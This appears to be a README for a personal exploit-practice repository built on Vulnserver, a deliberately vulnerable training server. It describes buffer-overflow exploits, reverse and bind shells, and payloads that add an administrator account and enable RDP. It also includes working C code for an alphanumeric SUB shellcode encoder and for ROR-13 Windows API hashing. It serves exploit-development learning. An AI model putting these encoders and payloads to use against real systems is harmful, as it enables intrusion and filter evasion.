Vulnserver is an intentionally vulnerable Windows application written to help people learn about exploiting buffer overflows. I used it to practice writing x86 assembly, fuzzing, and writing exploits for several types of buffer overflow.
This repository contains all of the custom tools and proof of concept exploits I created while working through Vulnserver.
Tools I developed to support proof of concept development against Vulnserver.
- chunk_file - Splits an executable in half to help narrow down which section is triggering antivirus detection
- compile_assembly - Modified version of a script from PentesterAcademy's x86 Assembly Language and Shellcoding on Linux course. Assembles the source, checks the result for null bytes, and outputs the shellcode
- encoder - Alphanumeric SUB encoder, derived from Metasploit's opt_sub.rb encoder and Corelan's Mona encoder
- fuzzing - Python script that automates fuzzing multiple commands with the SPIKE fuzzer. Requires a modification to the SPIKE source code
- safe_address_checker - Python script that validates a list of addresses against a set of allowed (good) characters
- str_to_hex - Python script that generates x86 assembly instructions for a list of strings
My initial focus was attacking Vulnserver installed on a Windows XP SP3 VM. The fuzzing scripts and the exploit for each command are:
- fuzzing - SPIKE scripts used to fuzz Vulnserver's commands
- gmon - Standard Structured Exception Handler (SEH) overwrite
- gter - Limited buffer size available for shellcode
- hter - Input is interpreted as a hex string and converted into the literal byte values, so the payload is sent as ASCII hex rather than raw bytes
- kset - Limited buffer size available for shellcode
- lter - Restricted character set; only alphanumeric characters are allowed
- trun - Straightforward buffer overwrite (direct EIP overwrite). I used this command to learn Windows API programming in x86 assembly language
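As an added example that is not part of this repository (it is not the `encoder` tool listed above), the following C program shows the three-SUB arithmetic that alphanumeric sub encoders such as Metasploit's opt_sub.rb and Mona's encoder are built on, which is what a restricted character set like LTER's forces on the shellcode. It solves each byte of the target little-endian with a carry chain, reports when the allowed set cannot produce the required byte sums (so a wider set or a different technique is needed), and verifies the result by doing what the CPU does: zero EAX and subtract the three immediates. The AND masks 0x554E4D4A/0x2A313235 are the classic ones; the two target dwords and the two charsets are this example's own choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The stub an encoder emits (opcode bytes in brackets) is
 *   AND EAX,0x554E4D4A [25] ; AND EAX,0x2A313235 [25]        -> EAX = 0
 *   SUB EAX,A [2D] ; SUB EAX,B [2D] ; SUB EAX,C [2D] ; PUSH EAX [50]
 * so EAX = 0 - A - B - C == target, i.e. A + B + C == -target (mod 2^32), and
 * every byte of A, B, C must come from the allowed set.  The opcode bytes
 * '%', '-', 'P' and the mask byte '*' have to survive the filter as well. */
typedef struct { unsigned char ok[256]; } charset_t;

static charset_t make_charset(const unsigned char *bytes, size_t n) {
    charset_t cs;
    memset(cs.ok, 0, sizeof cs.ok);
    for (size_t i = 0; i < n; i++) cs.ok[bytes[i]] = 1;
    cs.ok[0] = 0;                                   /* NUL is never usable */
    return cs;
}

/* First allowed x, y, z with x + y + z == need; 0 if none exists. */
static int find_triple(const charset_t *cs, int need, uint8_t *x, uint8_t *y, uint8_t *z) {
    for (int a = 1; a < 256; a++) {
        if (!cs->ok[a]) continue;
        for (int b = 1; b < 256; b++) {
            int c = need - a - b;
            if (c < 1 || c > 255 || !cs->ok[b] || !cs->ok[c]) continue;
            *x = (uint8_t)a; *y = (uint8_t)b; *z = (uint8_t)c;
            return 1;
        }
    }
    return 0;
}

/* Byte position i (0 = least significant): a[i]+b[i]+c[i]+carry must equal
 * n[i] + 256*k, and k is the carry into position i+1.  Later positions depend
 * only on k, so one triple per k is a complete search; the carry out of the
 * top byte is discarded (mod 2^32). */
static int solve_byte(const charset_t *cs, const uint8_t n[4], int i, int carry,
                      uint8_t a[4], uint8_t b[4], uint8_t c[4]) {
    if (i == 4) return 1;
    for (int k = 0; k <= 2; k++) {
        int need = n[i] + 256 * k - carry;
        if (need < 3 || !find_triple(cs, need, &a[i], &b[i], &c[i])) continue;
        if (solve_byte(cs, n, i + 1, k, a, b, c)) return 1;
    }
    return 0;
}

static uint32_t pack_le(const uint8_t v[4]) {
    return (uint32_t)v[0] | (uint32_t)v[1] << 8 | (uint32_t)v[2] << 16 | (uint32_t)v[3] << 24;
}

/* SUB immediates for `target` drawn from `allowed`; 0 when the set cannot
 * produce the needed byte sums and carries. */
int sub_encode(uint32_t target, const unsigned char *allowed, size_t n_allowed, uint32_t out[3]) {
    charset_t cs = make_charset(allowed, n_allowed);
    uint32_t neg = (uint32_t)0 - target;            /* A + B + C must equal this */
    uint8_t n[4], a[4], b[4], c[4];
    for (int i = 0; i < 4; i++) n[i] = (uint8_t)(neg >> (8 * i));
    if (!solve_byte(&cs, n, 0, 0, a, b, c)) return 0;
    out[0] = pack_le(a); out[1] = pack_le(b); out[2] = pack_le(c);
    return 1;
}

/* What the CPU computes from the stub: EAX cleared, then three SUBs. */
uint32_t sub_decode(const uint32_t imm[3]) {
    uint32_t eax = 0;
    for (int i = 0; i < 3; i++) eax -= imm[i];
    return eax;
}

static const unsigned char ALNUM[] =
    "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/* Encode with the alphanumeric set (wide == 0) or with every byte 0x01..0x7F
 * (wide == 1, for filters that only mangle high-bit bytes), decode, and check
 * that every immediate byte is allowed.  Returns 1 only if all of that holds. */
int roundtrip_ok(uint32_t target, int wide) {
    unsigned char low[127];
    for (int i = 0; i < 127; i++) low[i] = (unsigned char)(i + 1);
    const unsigned char *set = wide ? low : ALNUM;
    size_t n = wide ? sizeof low : sizeof ALNUM - 1;
    uint32_t imm[3];
    if (!sub_encode(target, set, n, imm) || sub_decode(imm) != target) return 0;
    charset_t cs = make_charset(set, n);
    for (int i = 0; i < 3; i++)
        for (int s = 0; s < 32; s += 8)
            if (!cs.ok[(uint8_t)(imm[i] >> s)]) return 0;
    return 1;
}

int main(void) {
    const uint32_t targets[2] = { 0xDEADBEEF, 0x0726774C };    /* example dwords */
    for (int t = 0; t < 2; t++) {
        uint32_t imm[3];
        if (sub_encode(targets[t], ALNUM, sizeof ALNUM - 1, imm))
            printf("%08X: sub eax,0x%08X ; sub eax,0x%08X ; sub eax,0x%08X\n",
                   (unsigned)targets[t], (unsigned)imm[0], (unsigned)imm[1], (unsigned)imm[2]);
        else
            printf("%08X: no alphanumeric-only encoding (byte sums out of range)\n",
                   (unsigned)targets[t]);
    }
    return 0;
}
```

The failure case is worth knowing before a payload is built: three alphanumeric bytes can only sum to values between 0x90 and 0x16E, so a byte of -target that needs a sum outside that band (after carry) has no alphanumeric-only encoding, and the encoder has to be told about a wider allowed set, or a different dword has to be chosen.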
The shellcode in this section resolves the Windows API functions it needs at run time with Stephen Fewer's ROR-13 hashing algorithm (the block_api technique used by Metasploit's Windows payloads) instead of hard-coded addresses, so the same shellcode can be used against each Vulnserver command.
- Custom Reverse Shell - Custom reverse shell built on CreateProcessA
- Port Rebind Shell - Firewall bypass: uses the port rebind technique to launch a custom bind shell
- Address Reuse Shell - Firewall bypass: uses the address reuse technique to bind to the interface IP address and port already used by Vulnserver and launch a custom bind shell
- Custom Bind Shell - Custom bind shell built on CreateProcessA
- Add User, Enable RDP - Uses the Windows API to create a new user, add it to the local Administrators group, and enable RDP
- Add User, Enable RDP via system() - Uses the system() call instead of direct API calls to create a new user, add it to the local Administrators group, and enable RDP
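As an added example that is not the repository's shellcode, the following C program computes Stephen Fewer's ROR-13 hash on the host, the way the constants pushed before `call ebp` are produced, and then shows what the shellcode's lookup loop does with such a hash against a constructed, deliberately fake module table (real export names, made-up addresses). The case normalization matters because older Windows versions store module names in the PEB in lower case and newer ones in upper case; both must hash to the same value.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t ror13(uint32_t v) { return (v >> 13) | (v << 19); }

/* Module half.  The loader stores BaseDllName as UTF-16LE and the shellcode
 * hashes MaximumLength bytes of it, i.e. the two-byte NUL terminator is
 * included; every byte >= 'a' has 0x20 subtracted first, so the loader's
 * choice of case does not change the result. */
uint32_t module_hash(const char *name) {
    uint32_t h = 0;
    size_t len = strlen(name) + 1;                  /* +1: hash the terminator */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c >= 'a') c -= 0x20;
        h = ror13(h) + c;                           /* low byte of the code unit */
        h = ror13(h);                               /* high byte is always 0 */
    }
    return h;
}

/* Function half: the ASCII export name, terminator included. */
uint32_t function_hash(const char *name) {
    uint32_t h = 0;
    const char *p = name;
    do { h = ror13(h) + (unsigned char)*p; } while (*p++ != '\0');
    return h;
}

/* The constant the shellcode pushes before `call ebp`; the sum wraps mod 2^32. */
uint32_t api_hash(const char *module, const char *function) {
    return module_hash(module) + function_hash(function);
}

/* Constructed stand-in for the module list the shellcode walks: real export
 * names, made-up addresses.  Only modules already loaded in the target appear
 * here, which is why a socket payload must LoadLibraryA("ws2_32") first when
 * the process has not loaded it itself. */
typedef struct { const char *module, *function; uint32_t address; } export_t;
static const export_t LOADED[] = {
    { "kernel32.dll", "LoadLibraryA",   0x10001000 },
    { "kernel32.dll", "CreateProcessA", 0x10002000 },
    { "kernel32.dll", "ExitProcess",    0x10003000 },
    { "ws2_32.dll",   "WSASocketA",     0x20001000 },
    { "ws2_32.dll",   "connect",        0x20002000 },
};

/* The lookup loop, minus the PEB and PE-header parsing: hash every export
 * seen and return the first match, or 0 if nothing matched. */
uint32_t resolve(uint32_t wanted) {
    for (size_t i = 0; i < sizeof LOADED / sizeof LOADED[0]; i++)
        if (api_hash(LOADED[i].module, LOADED[i].function) == wanted)
            return LOADED[i].address;
    return 0;
}

int main(void) {
    const char *want[][2] = {
        { "kernel32.dll", "LoadLibraryA" }, { "kernel32.dll", "ExitProcess" },
        { "ws2_32.dll", "WSASocketA" },     { "ws2_32.dll", "connect" },
    };
    for (size_t i = 0; i < sizeof want / sizeof want[0]; i++) {
        uint32_t h = api_hash(want[i][0], want[i][1]);
        printf("push 0x%08X ; hash(\"%s\", \"%s\") -> resolves to %08X\n",
               (unsigned)h, want[i][0], want[i][1], (unsigned)resolve(h));
    }
    return 0;
}
```

Because the comparison is on the full 32-bit sum, a collision between two exports in the loaded modules would silently resolve the wrong function; checking a freshly computed hash against the target's loaded modules before relying on it is cheap insurance.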
Future work I still plan to do on this repository:
- Upgrade all of the tools and exploits to Python 3
- Practice against newer Windows operating systems
- Practice with mitigations enabled, such as DEP, ASLR, and strict firewall rules